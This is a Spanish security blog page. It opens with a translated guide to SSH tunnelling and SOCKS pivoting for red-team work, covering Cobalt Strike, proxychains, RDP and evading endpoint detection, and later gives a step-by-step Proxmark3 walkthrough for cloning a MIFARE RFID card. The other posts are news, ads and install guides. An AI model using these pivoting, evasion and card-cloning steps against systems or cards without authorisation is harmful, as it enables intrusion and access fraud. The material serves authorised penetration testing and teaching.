OBJETIVO: Configurar la estación de trabajo privada de un analista para resolver nombres de host mientras se usa un proxy

De forma predeterminada, ni las cadenas de proxy ni el protocolo SOCKS4 admiten solicitudes de DNS. Una solución alternativa es agregar una entrada para el nombre de host de destino en el archivo /etc/hosts donde se usa proxychains. Esto permitirá que el sistema operativo busque la dirección IP del host de destino localmente, antes de que se envíe a través del túnel. Sin embargo, los protocolos SOCKS4a y SOCKS5 son capaces de manejar solicitudes de DNS y no requieren una entrada en el archivo /etc/hosts. Para habilitar el soporte de DNS para las cadenas de proxy, edite el archivo de configuración, /etc/proxychains4.conf, y des-comente la línea "proxy_dns":

# Proxy DNS requests — no leak for DNS data

proxy_dns

Para habilitar el soporte de DNS transparente para algunas herramientas de Linux, se debe identificar un servidor DNS en la red de destino interna para enviar las solicitudes de DNS. Exporte la variable de entorno "PROXYRESOLV_DNS" con un valor del servidor DNS interno como:

export PROXYRESOLVE_DNS=192.168.1.1

Túnel de reenvío del puerto local

OBJETIVO: Reenviar el tráfico desde la estación de trabajo privada de un analista a un servidor proxy SOCKS.

Es posible que un analista no desee ejecutar herramientas desde un host accesible a Internet como REDIR1. Un escenario más probable es utilizar una máquina virtual (VM), LINUX1, de la propia red interna del analista. Para hacer esto, use la misma configuración de antes para crear un proxy SSH SOCKS y un túnel de reenvío de puerto remoto. Es necesario crear un túnel adicional desde la VM del analista, LINUX1 hasta el redirector, REDIR1.

Utilice SSH -L [bind_address:] port: host: hostport para configurar un túnel y reenviar el tráfico desde la VM local del analista, LINUX1, al redirector, REDIR1. Esto crea un túnel de reenvío de puerto local desde LINUX1 a REDIR1. Este comando es como usar la bandera -R, pero la principal diferencia es la dirección en la que fluye el tráfico a través del túnel. La bandera -L envía tráfico desde el host de origen al host remoto, donde la bandera -R envía tráfico desde el host remoto al host de origen. La fuente se determina en función de dónde se ejecuta el comando SSH.

Utilice el cliente SSH en LINUX1
Cree un túnel de reenvío de puerto local desde el host de origen, LINUX1, al host remoto, REDIR1
En el host local, LINUX1, escuche en bind_address, 127.0.0.1, en el puerto 9050
Reenviar la conexión desde el host local al puerto que ya está escuchando en el host remoto, REDIR1, adaptador host loopback 127.0.0.1 hostport 9051
El cliente SSH debe conectarse a REDIR1 e iniciar sesión como rastley

Una vez que el túnel se ha configurado desde LINUX1, el analista puede volver a usar cadenas de proxy en su VM para ejecutar herramientas. Actualice el archivo de configuración de proxychains en /etc/proxychains4.conf para usar el túnel SOCKS5 accesible en el puerto 9050 (por ejemplo, socks5 127.0.0.1 9050). El tráfico de esas herramientas se enrutará de LINUX1 a REDIR1, y luego de REDIR1 a PWNED1 y, finalmente, de PWNED1 al host de destino en la red interna del cliente.

Navegador web

OBJETIVO: Configurar el navegador web de un analista para usar un proxy SOCKS.

Los analistas también pueden utilizar otros programas que tienen soporte de proxy SOCKS integrado, como Firefox, para acceder a aplicaciones web en la red de un cliente. El host que ejecuta el navegador web debe estar configurado con un túnel de escucha a un proxy SOCKS como se documenta en la sección anterior. Para configurar Firefox para usar el proxy SOCKS en LINUX1, abra el menú Configuración de conexión de red y configúrelo para usar el puerto de escucha en 9050. Una vez configurado Firefox, todo el tráfico se enviará a los hosts de la red interna. No olvide que el DNS no funcionará a través de un túnel SOCKS4. Los analistas pueden comunicarse con un host por su dirección IP interna o crear una entrada en el archivo /etc/hosts.

Suite Burp

OBJETIVO: Configurar Burp Suite para usar cadenas de proxy y un proxy SOCKS.

A veces, un analista puede querer duplicar y usar un proxy HTTP, como Burp Suite, en su VM junto con un proxy SOCKS. Burp suite ha incorporado soporte para un servidor SOCKS; sin embargo, la experiencia ha demostrado que no funciona bien cuando se usa con servidores SOCKS de herramientas como Cobalt Strike. El mejor enfoque es iniciar Burp Suite con cadenas de proxy en lugar de configurar explícitamente Burp Suite para usar un servidor SOCKS. Siga los pasos de las secciones anteriores para configurar un túnel en la VM que se conecta al puerto SOCKS.

Estructuras de comando y control (C2)

OBJETIVO: Herramientas y tráfico proxy desde la estación de trabajo privada de un analista a la red del cliente a través de un marco C2.

Algunos marcos de C2 utilizan un agente que tiene incorporado un servidor SOCKS como Mythic‘s, Poseidón y Cobalt Strike’s Beacon. El uso de las capacidades integradas de SOCKS de un agente elimina la necesidad de configurar múltiples túneles SSH.

Desde el símbolo del sistema de Cobalt Strike Beacon, ejecute el comando socks 9051. Esto creará un puerto de servidor SOCKS de escucha en Cobalt Strike Team Server (REDIR1), no en el host donde se ejecuta el agente (PWNED1) ni en el host donde se ejecuta el cliente de interfaz de usuario Cobalt Strike (LINUX1). Todo el tráfico enviado al puerto SOCKS de escucha en el Team Server se enviará posteriormente al host comprometido donde se está ejecutando Beacon.

Una vez que el puerto del servidor SOCKS esté escuchando en el Team Server, configure un puerto local de reenvío desde la VM del operador (LINUX1) al Team Server (REDIR1). Una vez que se ha configurado el túnel, se pueden utilizar herramientas como las cadenas de proxy y Firefox para enviar tráfico a la red interna del cliente.

Protocolo de escritorio remoto (RDP)

OBJETIVO: utilizar RDP a través de un proxy SOCKS desde la estación de trabajo privada de Linux de un analista.

Los administradores suelen utilizar RDP para acceder de forma remota a un host de Windows y aprovechar la GUI de Windows para realizar tareas. Por esta misma razón, los analistas a menudo también querrán utilizar RDP para acceder a un sistema de información de destino. Los túneles SSH y los proxies SOCKS se pueden utilizar para transportar un cliente RDP desde el host de un analista a un entorno de destino y controlar de forma remota un host. El cliente xfreerdp de Linux es un programa de uso común para acceder de forma remota a un host Linux. Con un servidor SOCKS y túneles ya en funcionamiento, use proxychains para conectarse al entorno de destino con xfreerdp.

Utilice el cliente proxychains en LINUX1
Proxy en el cliente xfreerdp
Conéctese al hostname del servidor remoto 192.168.1.10
Conéctese al servicio RDP en el puerto remoto 3389
Inicie sesión con el usuario administrador
Inicie sesión con la contraseña Passw0rd1

Otras banderas útiles incluyen: /clipboard para compartir datos de los comandos de copiar y pegar entre su host y el sistema remoto. Además, la bandera /drive:MyDrive,/tmp crea un recurso compartido de archivos llamado MyDrive en el host de Windows que se puede usar para transferir archivos hacia y desde el directorio /tmp en el host de origen, LINUX1.

Windows

OBJETIVO: Herramientas y tráfico proxy desde la estación de trabajo privada de Windows de un analista a la red del cliente.

Windows 10 tiene un cliente OpenSSH integrado que se puede usar para crear un túnel de reenvío de puerto local SSH para el tráfico de proxy en la red de destino. Sin embargo, proxychains no es compatible con Windows. Una alternativa es utilizar Proxifier. El host que ejecuta Proxifier debe configurarse con un túnel SSH a un puerto proxy SOCKS de escucha como se documenta en las secciones anteriores. Una vez que el túnel esté configurado, abra Proxifier y vaya al menú Perfil. Agregue un servidor proxy que apunte al túnel SSH de reenvío del puerto local que se configuró en el host de Windows.

El proxy se puede configurar para enrutar todo el tráfico desde su máquina virtual de Windows a través del proxy SOCKS hacia la red de destino. Alternativamente, Proxifier ofrece una opción más segura de OPSEC para crear reglas que restrinjan el tráfico a través del proxy SOCKS para programas específicos. Para agregar una regla, vaya al menú Perfil y seleccione Reglas de proximidad y agregue aplicaciones que deberían poder usar el proxy. Esta imagen muestra una regla que solo transferirá el tráfico de cmd.exe, rubeus.exe, mstsc.exe y powershell.exe.

Advertencias de Proxifier

Si bien Proxifier puede permitir que un analista utilice herramientas de Windows y envíe tráfico a la red de un cliente, hay varios "errores" que se deben tener en cuenta. El primero es considerar las credenciales asociadas con la sesión de inicio de sesión que está ejecutando la herramienta. La cuenta de usuario local del host de Windows de un analista no se autenticará correctamente en los recursos de red de un cliente. Se recomienda utilizar el programa runas.exe con la bandera /netonly para crear una nueva sesión con credenciales para un usuario válido en el dominio del cliente. Otras alternativas incluyen parchear LSASS con un hash NTLM o importar un TGT de Kerberos en la sesión de inicio de sesión actual con una herramienta como Rubeus.

Las aplicaciones que utilizan implícitamente otros servicios de Windows o el kernel de Windows NT para conectarse a un host remoto no podrán comunicarse a través del proxy. Algunos programas utilizan de forma transparente los otros servicios del sistema operativo (por ejemplo, RPC, DCOM o WMI) o el kernel de Windows (por ejemplo, SMB) bajo el capó. Un ejemplo de esto es cuando se usa el Explorador de Windows para explorar un recurso compartido de archivos SMB. El proceso del sistema que representa el kernel de Windows, intentará conectar el recurso compartido SMB, pero la conexión se agotará porque la conexión de red del kernel no pasa por el proxy. De manera similar, cuando hay un intento de autenticarse en un controlador de dominio usando Kerberos, lsass.exe realiza la conexión con los controladores de dominio, no con la aplicación de origen que inició la solicitud. Esta actividad también se puede ver al intentar usar el comando net view o los cmdlets Get-Net* de PowerView porque usan conexiones de red RPC que se originan principalmente en el Kernel o el servicio RPCSS.

Además, algunas herramientas como BloodHound o Rubeus dependen de determinadas variables de entorno de Windows para identificar el dominio de Active Directory y los servidores de inicio de sesión. Debido a que la estación de trabajo privada de Windows de un analista no está unida a un dominio, esas variables de entorno no existirán. Una solución alternativa es especificar siempre el dominio, el controlador de dominio y las credenciales explícitas según la herramienta y los argumentos disponibles (por ejemplo, el cmdlet Get-DomainUser de Powerview).

Túnel HTTP

OBJETIVO: Crear un túnel utilizando el protocolo HTTP.

Los operadores pueden utilizar el protocolo HTTP para crear un túnel. Esto es útil cuando el protocolo SSH no puede salir de la red de destino en los puertos 22, 80 o 443. Casi todas las organizaciones permiten que el protocolo HTTP salga de la red, ya que se utiliza para las actividades diarias y las operaciones comerciales. gTunnel es una "solución de tunelización HTTP/2 multiplataforma que tiene como objetivo proporcionar túneles de red rápidos y sencillos que son eficientes y sigilosos". La herramienta es compatible con túneles de reenvío y reversos, así como con el protocolo proxy SOCKS5. El analista deberá colocar el cliente gTunnel en el host comprometido, PWNED1, para crear una conexión. Visite la documentación de gTunnel para obtener detalles sobre los pasos para comenzar.

Conclusión

Los túneles SSH y los proxies SOCKS son invaluables durante las operaciones de seguridad ofensivas, pero también pueden ser un poco confusos de configurar. Es de esperar que la información detallada para cada parte de un comando, seguida de un gráfico visual, facilite la comprensión de las cosas. Aprovechar los túneles de reenvío de puertos remotos y locales del cliente SSH permite al analista eludir las restricciones de seguridad de la red. Los analistas pueden combinar túneles SSH con un proxy SOCKS para ejecutar sus herramientas en un host donde no hay aplicaciones de monitoreo de puntos finales. Esto se puede utilizar para evitar las detecciones y permite un uso flexible de programas que pueden ejecutarse en diferentes sistemas operativos. Con suerte, esta publicación se utiliza como punto de referencia para desmitificar la complejidad de configurar túneles SSH y proporciona ejemplos detallados como punto de referencia para operaciones futuras.

Traducido de: SPECTEROPS

ESCRITORIO REMOTO DE CHROME

2021-04-23T11:07:00.000-05:00

En el mercado existen varios programas que ofrecen el servicio de escritorio remoto, en esta entrada vamos a hablar de la herramienta que ofrece Google para acceder a un equipo remoto desde un navegador web.

Acceso remoto al equipo personal

En el caso de que necesite ingresar a su equipo personal desde otras ubicaciones a través del escritorio remoto de Chrome, lo primero a tener en cuenta es que debe tener instalado en su equipo la aplicación del escritorio remoto de Chrome. Para descargar este programa vaya a la URL https://remotedesktop.google.com/access (Si no tiene iniciada sesión en Google, debe iniciarla), en la opción “Configurar acceso remoto” haga clic en el icono de descarga.

Una vez haya hecho clic en el icono de descarga, será redirigido a la Chrome web store para instalar la extensión “Chrome Remote Desktop”, allí haga clic en el botón “Agregar a Chrome” y siga las instrucciones. Cuando la extensión haya sido agregada a Chrome, se iniciará el proceso de descarga de la aplicación a su equipo.

Luego haga clic en el botón “Aceptar e instalar” para iniciar el asistente de instalación, siga las instrucciones del asistente para configurar la aplicación y al final haga clic en el botón “Iniciar”. Si todo salió bien, en la página saldrá el nombre asignado al equipo y debajo la leyenda “En línea”.

Ahora ya puede acceder a su equipo desde cualquier lugar, siempre y cuando su equipo se encuentre encendido y conectado a internet.

Para acceder a su equipo desde cualquier otro equipo, realice los siguientes pasos

Ingrese a la URL https://remotedesktop.google.com, allí seleccione la opción “Acceder a mi computadora”.
Inicie sesión en su cuenta de Google.
Seleccione el equipo al cual va a acceder.
Finalmente, ingrese el PIN de seguridad

Una vez se haya conectado, en su equipo saldrá el mensaje “Tu ordenador está compartido actualmente con (Dirección de correo utilizada para la conexión)”.

Soporte remoto con el Escritorio Remoto de Chrome

En caso de que por algún motivo requiere asistencia remota en su equipo, con el escritorio remoto de Chrome también es posible que se realice este tipo de soporte, para utilizar este servicio siga los siguientes pasos:

Ingrese a la URL https://remotedesktop.google.com/support (sí aún no ha descargado la aplicación, siga los pasos descriptos anteriormente para descargarla).
En la sección “Compartir esta pantalla” haga clic en el botón “Generar código”.
En el equipo desde el cual se va a brindar el soporte también se debe ingresar a la URL https://remotedesktop.google.com/support.
En la sección “Conectarse a otro ordenador” se debe ingresar el código generado en el equipo al que se le va a brindar el soporte y se debe hacer clic en el botón “Conectar”.
Finalmente, en el equipo que va a recibir el soporte se debe aceptar la conexión haciendo clic en el botón “Compartir” de la ventana emergente que se desplegará.

El escritorio remoto de Chrome puede ser una buena alternativa, más aún si en el equipo desde el que necesitamos hacer la conexión o brindar el soporte, no es posible instalar software.

Aunque el nombre de la aplicación es Escritorio Remoto de Chrome, al contrario de lo que se creería, no es indispensable utilizar dicho navegador para acceder a la plataforma web, para realizar este articulo se accedió a dicha plataforma utilizando los navegadores Brave y Firefox, y no se presentó ningún problema de funcionamiento.

@jmvargas19

@TheHackingDay

CONOCIENDO LA PROXMARK3 A PROFUNDIDAD

2021-04-16T15:39:00.001-05:00

Continuando con la serie de artículos sobre la Proxmark3, luego de nuestra publicación PRIMEROS PASOS CON LA PROXMARK3 EN KALI, llega esta nueva entrada en la cual profundizaremos un poco más en cuanto a los componentes y funcionamiento de la Proxmark3.

Debemos tener en cuenta que la “PROXMARK3” no solo es un dispositivo de lectura y copia de información de tarjetas RFID (Identificación por Radiofrecuencia), este dispositivo nos entrega una alta gama de oportunidades para hacer Pentesting, en campos basados en la tecnología RFID tales como: Tarjetas Bancarias, Sistemas de seguridad basados en tecnologías RFID de baja o alta frecuencia, Sistemas integrados de transporte, Datafonos, Entre otros.

Cabe resaltar que este artículo fue creado y diseñado con una finalidad instructiva y los riesgos por el uso indebido de las herramientas o tecnologías analizadas en este artículo, estarán basados en las leyes de su país y bajo toda su responsabilidad.

Antes de comenzar a utilizar este interesante Gadget es bueno conocer las características que a nivel de hardware y software tiene la Proxmark3, para así llevar a cabo un correcto uso de la misma, este artículo se dividirá en 2 partes:

Hardware:

Componentes

Software:

Entorno del programa
Como navegar a través de su interfaz
Ejemplo práctico con tarjetas RFID

HARDWARE:

En la actualidad existen muchas herramientas que nos facilitan el trabajo a nivel de seguridad e información, siendo la Proxmark3 una de las principales, ya que esta pequeña herramienta nos provee dos tipos de antenas, las cuales nos permiten obtener lecturas de tarjetas y/o dispositivos de bajas y altas frecuencias.

Antena de alta frecuencia (IC HF ANT): Elimina las zonas muertas al momento de generar una lectura de información, además es capaz de leer los datos de las tarjetas o dispositivos RFID basados en altas frecuencias sin interrupciones (se debe tener en cuenta si las tarjetas están programadas con un alto/medio nivel de seguridad).

Antena de baja frecuencia (ID LF ANT): Es utilizada para mejorar el SNR (Relación Señal/Ruido), permite una tasa de reconocimiento de dispositivos más alta, además de leer tarjetas o dispositivos RFID basados en bajas frecuencias sin interrupciones (se debe tener en cuenta si las tarjetas están programadas con un alto/medio nivel de seguridad).

Indicadores de estado LED (ABCD Status LED): Muestran el estado en el que está funcionando nuestro dispositivo, los cuales pueden ser programados y configurados para que funcione de la manera que el operador deseé.

SOFTWARE:

Esta herramienta tiene su propio programa, el cual es Open Source, y se puede obtener desde su repositorio en GitHub, pero este no es el único que se ha desarrollado; el que utilizaremos para realizar las actividades será el de “RfidReserarchGroup” ya que es el más completo y funcional que existe actualmente, el proceso de descarga e instalación de este software lo encuentran en el artículo PRIMEROS PASOS CON LA PROXMARK3 EN KALI.

Entorno del programa: Su interfaz de usuario es muy similar a las interfaces de otras herramientas utilizadas en Kali Linux.

Es una interfaz más dada para programadores, pero con la práctica e investigación, su uso deja de ser difícil y se vuelve un poco más interactivo.

Cómo navegar a través de su interfaz: Para navegar se deben utilizar los comandos que podemos encontrar en el repositorio de GitHub o simplemente ejecutar el comando “Help” para así encontrar los menús, comandos, librerías y ejemplos utilizados para la Proxmark3. Al ejecutar el comando “Help” se encuentran los apartados “Technology” y “General” que contienen varios comandos, los cuales, al ser ingresados en la terminal, muestran una descripción de su funcionamiento.

Ejemplo práctico con tarjetas RFID:

antes de abordar el ejemplo práctico se debe tener en cuenta que para cada tipo de tarjeta RFID se debe realizar un diferente proceso de análisis, hackeo, dumpeo y adquisición de claves e información.

Paso #1:

Para empezar, se debe saber a qué tipo de tarjeta RFID se va a atacar, para ello se ejecuta el comando “auto”.

La Proxmark3 automáticamente leerá la tarjeta que se pone en cualquiera de las dos antenas, con este simple procedimiento se obtendrá la siguiente información: Referencia, Modelo, Tecnología, Identidad del usuario (UID), Código ATQA del usuario, Tipo de la información almacenada, Norma ISO que cumple.

Para este ejemplo se ha elegido una tarjeta RFID “SmartMX with MIFARE Classic 4k”

Como se observa en la anterior imagen, los datos obtenidos con el comando “auto” son los siguientes:

Es una tarjeta que se genera de forma masiva y tiene un datasheet para su modelo.
Referencia: SmartMX with MIFARE Classic 4k
Modelo: SmartMX with MIFARE Classic 4k
Tecnología: SmartMX
Identidad del usuario (UID): 45 82 EB 26
Código ATQA del usuario: 00 04
De qué tipo es la información que se encuentra almacenada: ATS
Norma ISO que cumple: ISO14443-A

Además de estos datos, se observa que la base de datos de la tarjeta no es segura, ya que no se encuentra llena o programada, es decir, fue generada rápidamente. Este tipo de tarjetas son comunes en los sistemas masivos de transporte público, ascensores o en empresas con marcadores de horario laboral.

Paso #2:

Para corroborar que la tarjeta objetivo no tiene su base de datos programada o configurada, se debe extraer la información en un archivo en el cual sea posible leerla, para esto, se utiliza el comando “hf mf autopwn”.

Un archivo de una tarjeta RFID limpia debería verse como se observa en la siguiente imagen.

Para acceder al archivo se utiliza el comando “q cat hf-mf-4582EB26-dumb.eml”

Paso #3:

Ahora solo falta copiar la información en la tarjeta que será el clon, hemos elegido una “Magic MIFARE Classic 1k”.

“Para clonar cualquier tarjeta RFID se debe tener una tarjeta mágica, ya que esta permite la lectura y escritura en su base de datos y sus credenciales”

La información obtenida en la tarjeta objetivo es tan básica que cabe en una tarjeta de menor capacidad, por ello la de 1K nos funcionara para este proceso, a continuación, se puede observar la información original de la tarjeta clon:

Podemos ver que es una tarjeta mágica y que funciona para la generación 1a es decir la misma generación de la tarjeta objetivo “ISO14443-A”, además su base de datos está limpia:

Paso #4:

Ahora se coloca la nueva tarjeta sobre la antena de alta frecuencia de la Proxmark3 y se ingresa el comando “hf mf csetuid UID ATQA SAK” el cual para el caso de la tarjeta que se va a clonar en este ejercicio quedaría: “hf mf csetuid 4582EB26 0004 38”. Y empezará el proceso de clonación de UID e información.

Paso #5:

Para finalizar, se compara la tarjeta RFID objetivo con la tarjeta RFID clon y ¡Excelente!, se ha clonado correctamente.

La Proxmark3 no solo puede clonar tarjetas RFID de acceso, también puede leer, clonar u obtener protocolos de comunicación de: tag RFID de ropa, tarjetas de crédito, celulares, datafonos, contraseñas desde un puerto lector, horas de ingresos, protocolos de comunicación entre la tarjeta y su lector, etc. Es por ello que es una herramienta necesaria para el arsenal de los profesionales en seguridad informática.

Autor: Alejandro Loaiza Arévalo - @alejandro_la.111

EL NUEVO ESTÁNDAR WIFI 802.11BF QUE PODRÁ DETECTAR EL MOVIMIENTO Y MEDIR DISTANCIAS

2021-04-15T08:22:00.000-05:00

Aunque la IEEE tiene planeado lanzar el estándar Wifi802.11bf en el año 2024, ya se han ido conociendo cosas interesantes que traerá esta nueva actualización del estándar, entre las que resalta que permitirá no solo transmitir la señal inalámbrica sino aprovecharla para identificar todo aquello que se encuentre en movimiento dentro de su radio de acción.

El estándar 802.11bf utiliza la tecnología de detección Wifi “Wifi Sensing” (SENS). Esta tecnología utiliza las señales inalámbricas recibidas para detectar las características de un objetivo en un entorno determinado, obteniendo información de rango, velocidad, ángulo, movimiento y proximidad, lo cual se puede utilizar para identificar personas, objetos y animales.

Con SENS los dispositivos Wifi podrán informar a otros dispositivos su capacidad de detección Wifi, solicitar y configurar transmisiones que permitan realizar mediciones Wifi, entre otras características. SENS puede ser utilizado en nuevas aplicaciones industriales y comerciales, así como en aplicaciones de usuario final, tales como, la seguridad del hogar, el entretenimiento, la gestión de la energía, entre otras.

Con la implementación del estándar 801.11bf se estima que los sensores y cámaras de monitoreo remoto ya no sean requeridos, ya que la tecnología SENS utiliza los dispositivos compatibles con el estándar para realizar el seguimiento y monitoreo, eliminando así la necesidad de contar con dispositivos especializados de monitoreo.

Si bien, es amplio el panorama de aplicaciones que se le podrían dar el nuevo estándar, también surgen algunas dudas sobre qué tan seguro será este y que tanto protegerá la privacidad de los usuarios, sobre este tema el profesor de la universidad Northeastern, Francesco Restuccia, dice en su artículo IEEE 802.11bf: Toward Ubiquitous Wi-Fi Sensing que los esfuerzos de investigación y desarrollo se están centrando en mejorar la precisión de los fenómenos que se están monitoreando, con poca atención a los problemas de seguridad y privacidad. Restuccia también explica que, dada la naturaleza de transmisión del canal inalámbrico, un intruso malintencionado podría 'escuchar' fácilmente los informes de CSI (Información del estado del canal) y rastrear la actividad del usuario sin autorización.

Como podemos observar, aún le queda mucho trabajo por hacer al grupo de la IEEE que está dedicado a este nuevo estándar, más que nada en temas relacionados con la seguridad, la privacidad y algunos problemas de interferencia que se puedan presentar como resultado de compartir el espectro con otras tecnologías inalámbricas, pero esperemos que de acá a su lanzamiento programado para el año 2024 ya hayan logrado avanzar en estos temas.

@jmvargas19

@TheHackingDay

LLEGA LA HORA DEL DECIMO BOOTCAMP DE CIBERSEGURIDAD

2021-04-12T10:19:00.001-05:00

Continuamos con nuestro calendario de cursos y certificaciones, es por ello que les queremos contar que para Colombia se viene el decimo Bootcamp de Ciberseguridad, el cual es realizado por Confa. En este Bootcamp dictaremos nuestra reconocida certificación internacional THD-EPC (Ethical Pentester Certified), en la cual los asistentes aprenderán a comprometer la seguridad de una organización a través del uso de herramientas, técnicas y metodologías que son ampliamente utilizadas en el mundo de los ataques informáticos.

Teniendo en cuenta que aún continúan las restricciones por motivo de la pandemia, este decimo Bootcamp se realizará en modalidad virtual, lo que facilita la participación de personas de cualquier lugar.

Para esta ocasión y con el fin de obtener la máxima participación, se realizara en dos partes:

La primera del 1 al 3 de Julio y la Segunda del 8 al 10 de Julio en un horario de 8:00 Am a 6:00 Pm

Y siguiendo la filosofía de Confa, el curso estará subsidiado incluso para los no afiliados a esta caja de compensación, así que el precio oficial de 950 US, tiene una rebaja más del 50% a través de:

https://confa.co/personas/educacion/capacitacion/certificaciones-internacionales/

Para obtener más información sobre la metodología y los días en que se realizará la certificación, los invitamos a que se pongan en contacto con Confa y a que estén pendientes de la página de THD Security.

@jmvargas19

@TheHackingDay

LLEGÓ KALI LINUX 2021.1

2021-02-25T16:12:00.000-05:00

Acaba de ser lanzada la nueva versión de Kali, hoy le damos la bienvenida al Kali Linux 2021.1, esta es la primera versión que es lanzada en este año y trae algunas mejoras de las características existentes en la versión 2020.4.

Si bien los cambios entre estas versiones pueden no ser significativos para aquellos usuarios que hacen uso constante de esta distribución, si están pensados en facilitar las cosas para aquellos usuarios nuevos o que no son tan duchos en la utilización de Kali.

Veamos algunos de los cambios que trae esta nueva versión de Kali.

Actualización de los entornos de escritorio

Xfce 4.16: El entorno predeterminado de Kali tiene una nueva versión y esta no se podía quedar por fuera de este lanzamiento, en esta versión de Xfce se destaca el mejoramiento de la interfaz gráfica, incluyendo nuevos iconos para las aplicaciones principales, un acceso más rápido a las aplicaciones predeterminadas, nuevos atajos de teclado, más algunas otras tantas mejoras.

KDE 5.20: Si bien esta no es la última versión de plasma (La 5.21 fue lanzada el 16 de este mes), si trae varios cambios más que todo en su apariencia, algunos de los más significativos se encuentran en el fondo de pantalla, el administrador de tareas, la vista en cuadricula de la bandeja del sistema, entre algunos otros.

Ajustes en terminales

Pensando en que sus usuarios pasan la mayor parte del tiempo utilizando una terminal, la gente de Kali ha incluido en esta versión las terminales más utilizadas de Linux, ofreciendo así una amplia variedad y permitiendo que sea el usuario quien decida cual utilizar.

Ayuda con los comandos ingresados

Algo muy interesante en esta versión es la ayuda que incluye Kali cuando ingresamos un comando y este no es encontrado.

Esta ayuda se presenta de tres maneras: Si hemos ingresado el nombre de un paquete o ejecutable, saldrá un mensaje informando que el paquete no fue encontrado y muestra la manera en que se puede instalar. En caso de que se haya escrito mal un comando, saldrá un mensaje sugiriendo la manera adecuada de escribirlo. Finalmente, en caso de que el comando ingresado no exista o no sea válido en Kali, saldrá el ya conocido mensaje de "Comando no encontrado".

Asociación con autores de herramientas

En versiones anteriores Kali se había asociado con byt3bl33d3r, ahora se ha asociado con BC Security y Joohoi, en si el mayor beneficio de estas asociaciones es que los usuarios de Kali tienen acceso exclusivo a las nuevas versiones lanzadas de las herramientas desarrollados por sus socios.

Nuevas herramientas en Kali

Han sido incluidas varias herramientas nuevas al arsenal de Kali, como son tantas sería imposible hablar de todas en este articulo, por lo cual solo las vamos a nombrar ligeramente.

Airgeddon: auditoría de redes inalámbricas
AltDNS: genera permutaciones, alteraciones y mutaciones de subdominios y luego las resuelve
Arjun: suite de descubrimiento de parámetros HTTP
Chisel: un túnel TCP / UDP rápido a través de HTTP
DNSGen: genera una combinación de nombres de dominio a partir de la entrada proporcionada
DumpsterDiver: busca secretos en varios tipos de archivos
GetAllUrls: obtenga URL conocidas de Open Threat Exchange de AlienVault, Wayback Machine y Common Crawl
GitLeaks: busca secretos y claves en el historial del repositorio de Git
HTTProbe: tome una lista de dominios y pruebe los servidores HTTP y HTTPS en funcionamiento
MassDNS: un solucionador de stub de DNS de alto rendimiento para búsquedas masivas y reconocimiento
PSKracker: kit de herramientas WPA / WPS para generar claves / pines predeterminados
WordlistRaider: preparación de listas de palabras existentes

Pero la gente de Kali no se limitó solo a realizar cambios en su distro de escritorio, también realizaron algunos cambios en su página web, en Kali NetHunter y en sus imágenes ARM.

Fuente: Sitio web de Kali Linux

@jmvargas19

@TheHackingDay

PRIMEROS PASOS CON LA PROXMARK3 EN KALI

2021-02-24T16:21:00.002-05:00

Proxmark3 es un dispositivo que permite leer, reproducir y/o rastrear tecnologías RFID (Identificación por Radiofrecuencia) desde baja frecuencia LF (125 Khz) a alta frecuencia HF (13.56 Mhz). La Proxmark3 ofrece, según las etiquetas RFID específicas, funciones avanzadas como cifrado sin conexión, rastreo en línea, descifrado de claves predeterminado, volcado de datos o la capacidad de ejecutar simulaciones.

Este dispositivo es considerado como uno de los gadgets que todo Pentester debe tener en su arsenal de herramientas, por lo cual ha llamado nuestra atención y hemos estado realizando algunas pruebas de concepto con él. A continuación, explicaremos el paso a paso del proceso de instalación de la Proxmark3 en Kali Linux.

Lo primero que debemos de tener en cuenta es que Kali se encuentre actualizado (apt update && apt upgrade), luego se deben instalar algunas dependencias que son requeridas para el correcto funcionamiento de la Proxmark3. Para ello, ingresamos la siguiente sentencia: “sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config \ libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev libbluetooth-dev”.

Una vez se hayan instalado las anteriores dependencias, se procede a clonar el repositorio de github: “git clone https://github.com/RfidResearchGroup/proxmark3.git”.

Se accede a la carpeta proxmark3 “cd proxmark3”

Se hace un pull al repositorio en busca de actualizaciones “git pull”

En algunos casos se presentan fallas por el servicio modemManager que viene preinstalado en Kali, por lo cual es recomendable, antes de continuar, deshabilitarlo con el comando "service ModemManager stop". En caso de que no requiera tener el ModemManager en su máquina, elimínelo con el comando "apt remove modemmanager".

Se compila el entorno de la Proxmark3 según la versión del dispositivo con la que se cuente, en nuestro caso tenemos la Proxmark3 Easy por lo que utilizaremos el comando “make clean && make PLATFORM=PM3GENERIC” el cual se utiliza para versiones antiguas de la Proxmark3 y para versiones genéricas, si usted tiene la última versión de la Proxmark3 debe utilizar el comando “make clean && make all”.

Hasta este momento no ha sido necesario tener conectada la Proxmark3 al computador, pero para continuar con los siguientes pasos, asegúrese de tener este dispositivo conectado.

Una vez tiene la Proxmark3 conectada al equipo, se procede a actualizar al Firmware del dispositivo “./pm3-flash-all”.

Nota: Si el proceso de flasheo le falla, desconecte la Proxmark3 del computador => Presione el botón que la Proxmark3 trae en un costado => Sin dejar de presionar el botón, vuelva a conectar la Proxmark3 a su equipo => ejecute nuevamente el comando y espere hasta que el proceso finalice para dejar de presionar el botón.

Una vez finalizado el proceso anterior, se accede a la carpeta client “cd client”

Posteriormente, se inicia el servicio de la Proxmark3 con el comando “./proxmark3 /dev/ttyACM0” y si todo salió bien, debe obtener el siguiente resultado.

Para comprobar el estado de las antenas, ingrese el comando “hw tune”.

Y saldrá en pantalla una gráfica como la que se aprecia a continuación:

Seguiremos realizando pruebas con este dispositivos y en próximos les iremos contando qué tal nos va.

@jm19vargas

@TheHackingDay

NOVENO BOOTCAMP DE CIBERSEGURIDAD

2021-02-17T11:45:00.000-05:00

Continuando con el cronograma de nuestros cursos y certificaciones de este 2021, en el mes de Marzo realizaremos en Colombia una nueva versión del Bootcamp realizado por Confa en el cual dictaremos nuestra reconocida certificación internacional de hacking ético THD-EPC (Ethical Pentester Certified).

Esta ya es la novena versión del Bootcamp y teniendo en cuenta las restricciones actuales por cuenta de la pandemia del Covid-19, será realizado en modalidad virtual del 01 al 06 de Marzo, lo que posibilita tomar la certificación desde cualquier region.

Los invitamos a seguir pendientes de nuestro blog y de la página de thdsecurity, ya que en los próximos días estaremos anunciando nuevas sorpresas.

@jmvargas19

@TheHackingDay

¿QUÉ TAN SEGURA ES TU CONTRASEÑA?

2020-12-03T20:56:00.001-05:00

